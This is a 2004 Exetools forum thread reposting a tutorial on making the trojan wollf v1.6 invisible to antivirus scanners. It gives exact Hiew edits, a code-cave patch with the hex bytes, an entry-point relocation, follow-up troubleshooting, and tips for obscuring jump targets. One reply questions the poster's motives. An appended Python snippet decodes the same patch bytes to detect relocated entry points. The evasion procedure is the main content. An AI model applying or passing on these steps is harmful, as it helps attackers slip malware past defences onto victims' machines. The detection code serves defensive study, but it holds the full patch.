Exetools
Assembler Help

#1  03-24-2004, 11:23
Lana

++++++++++++++++++++++++++++++++++++++++
Universal method of tricking antivirus.
By Progressor

Tools:
Hex editor - I used Hiew 6.75 (http://webhost.kemtel.ru/~sen)
Fearless PE Tool 0.1 - http://areyoufearless.com/modules.php?op=m...q=getit&lid=125
UPX packer - http://upx.sourceforge.net/
Brain - must have it, you can't download it.

I took as an example the well-known trojan wollf v1.6 (www.xfocus.org)

Now, let's start:

Wollf is already packed with an old version of UPX, so we unpack it and pack it again with the newest version of UPX.
Now we open it in the PE tool and find this info about our trojan:

Entry Point: 00024FD0h
Image Base: 00400000h

Let us open wollf.exe in Hiew, go to disassemble mode (F4/Decode), go to address Entry Point + Image Base = 00424FD0h; to do this press Goto (F5) and type ".00424FD0" (you need the dot before the address because it is a virtual address). Now we see something like this:

CODE

.00424FD0: 60 pushad
.00424FD1: BE00804100 mov esi,000418000 -----^ (1)
.00424FD6: 8DBE0090FEFF lea edi,[esi][0FFFE9000]
.00424FDC: 57 push edi
.00424FDD: 83CDFF or ebp,-001;"O"
.00424FE0: EB10 jmps .000424FF2 -----v (2)

Now we have to find a place for our patch: scroll down a couple of pages and you'll see a lot of space filled with zeros. I chose address 00425147. To edit, press F3/F2.
OEP = Entry Point + Image Base

CODE

.00425147: 68D04F4200 push 000424FD0 <--- push OEP
.0042514C: 50 push eax
.0042514D: 9C pushfd <---for tricking AVP
.0042514E: 60 pushad <---for tricking AVP
.0042514F: E800000000 call .000425154 <----- call for Ret 28h

Add another command, Ret 28h, and you will see:

CODE

.00425154: C22800 retn 00028;" ("

To save, press F9.

And we add another 2 commands:
INC ECX
LOOP <patch address>

CODE

.00425161: 41 inc ecx <------- our new Entry Point
.00425162: E2E3 loop .000425147

Finally we have our patch:

CODE

.0042513F: 0000 add [eax],al
.00425141: 0000 add [eax],al
.00425143: 0000 add [eax],al
.00425145: 0000 add [eax],al
.00425147: 68D04F4200 push 000424FD0 -----^ (1)
.0042514C: 50 push eax
.0042514D: 9C pushfd
.0042514E: 60 pushad
.0042514F: E800000000 call .000425154 -----v (2)
.00425154: C22800 retn 00028;" ("
.00425157: 0000 add [eax],al
.00425159: 0000 add [eax],al
.0042515B: 0000 add [eax],al
.0042515D: 0000 add [eax],al
.0042515F: 0000 add [eax],al
.00425161: 41 inc ecx <------- our new Entry Point
.00425162: E2E3 loop .000425147 -----^ (3)
.00425164: 0000 add [eax],al
.00425166: 0000 add [eax],al
.00425168: 0000 add [eax],al

And the last thing we should do: open the file in the PE tool and change the Entry Point:
Entry Point = Offset - Image Base = 00425161 - 00400000 = 0025161h

Now, if you can unpack the file with UPX, then I suppose you did it right. (Don't forget to back up your file or you'll have to make this patch again.)
Enjoy.
+++++++++++++++++++++++++++++++++++++++++++++++

I don't know any assembly but I'm always eager to learn.

I encountered a problem while trying to reproduce the above:

call .000425154
loop .000425147

In both cases Hiew gives me an error "Invalid Operand". I CAN add the addresses without a "dot" but I guess that won't work.

Any idea what I'm doing wrong?

Thanks in advance
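For the defender's side of the post above, here is an added example (not from the thread or from Progressor) in Python: it applies the post's own arithmetic and bytes to a UPX-packed image's entry point, decoding the LOOP rel8 displacement and flagging an entry point that no longer begins with the UPX prologue and sits in zero padding. The two byte windows and the 12-of-16-zeros threshold are constructed assumptions for the example.

```python
# Added example: triage checks for a relocated entry point in a UPX-packed PE.
# Byte values are those quoted in the post; the windows themselves are constructed.
IMAGE_BASE = 0x00400000

# Constructed window: the UPX stub at the original entry point 0x424FD0.
UPX_STUB_VA = 0x00424FD0
UPX_STUB = bytes.fromhex("60" "BE00804100" "8DBE0090FEFF" "57" "83CDFF" "EB10")

# Constructed window: the patch cave 0x42513F..0x425169 from the final listing.
PATCH_VA = 0x0042513F
PATCH = bytes.fromhex(
    "0000000000000000"           # 0x42513F  zero padding
    "68D04F4200" "50" "9C" "60"  # 0x425147  push OEP / push eax / pushfd / pushad
    "E800000000"                 # 0x42514F  call .425154
    "C22800"                     # 0x425154  retn 28h
    "00000000000000000000"       # 0x425157  zero padding (10 bytes)
    "41" "E2E3"                  # 0x425161  inc ecx ; loop .425147 (new entry point)
    "000000000000"               # 0x425164  zero padding
)


def ep_rva(va: int, image_base: int = IMAGE_BASE) -> int:
    """Entry Point header field = virtual address - image base (the post's formula)."""
    return va - image_base


def loop_target(window: bytes, window_va: int, insn_va: int) -> int:
    """Decode a 2-byte LOOP rel8 (opcode E2): target = next instruction + signed rel8."""
    off = insn_va - window_va
    if window[off] != 0xE2:
        raise ValueError("not a LOOP rel8 instruction")
    rel8 = int.from_bytes(window[off + 1:off + 2], "little", signed=True)
    return insn_va + 2 + rel8


def entry_point_findings(window: bytes, window_va: int, ep_va: int) -> dict:
    """Heuristics a triage script can apply to the entry point of a UPX-packed PE."""
    off = ep_va - window_va
    if not 0 <= off < len(window):
        raise ValueError("entry point outside the supplied window")
    before = window[max(0, off - 16):off]  # up to 16 bytes preceding the EP
    zeros = before.count(0)
    return {
        "ep_rva": ep_rva(ep_va),
        # genuine UPX stubs begin with pushad ; mov esi, imm32 (60 BE ...)
        "upx_prologue": window[off:off + 2] == b"\x60\xBE",
        "zero_bytes_before": zeros,
        # an EP surrounded by null padding is a classic sign of a relocated EP
        "in_cave": len(before) == 16 and zeros >= 12,  # threshold is an assumption
    }
```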
#2  03-24-2004, 16:34
least
Well,
notice that when in edit mode, Hiew doesn't show virtual addresses but offsets; so write the corresponding offset and you are done.
But one question comes to my mind: why are you trying to repack a trojan and hide it from AVP??? So why, instead of damaging people, won't you try to do some cracking? Is it too hard when compared to simply applying someone else's ideas to someone else's trojan?
#3  03-25-2004, 09:57
Lana
Heh, I'm not trying to destroy anything dude, it's just the first thing I got my hands on. =/

Anyways, one more question:
after this command,
.00425162: E2E3 loop .000425147 -----^ (3)

I got an error, "jump out of bounds".....??
#4  03-26-2004, 02:04
least
Are you sure you typed in the right offset (of the instruction push 000424FD0)?
The error means that you are trying to jump too far...
#5  03-26-2004, 09:34
Lana

Yup, I triple checked it, but no luck.

help
#6  03-26-2004, 16:19
least
So go from the other end: type in the hex values (E2 E3) and see what comes from it, then compare with what you typed in before.
#7  03-27-2004, 04:29
Lana

Cool, that worked, much thanks Least.

I was thinking, is it possible to not use the direct addresses? E.g., if I want to have 0x00430F00, I push 0x00430000 and add F00 later. I hope you understand. Is it possible?
#8  03-27-2004, 06:00
least
Of course yes, you can push one value, add something to it, then ret and you are there; or you can do something like jmp eax, where eax can be calculated any way you can think of. And much more: get the processor manuals and use your imagination (or google).
All times are GMT +8.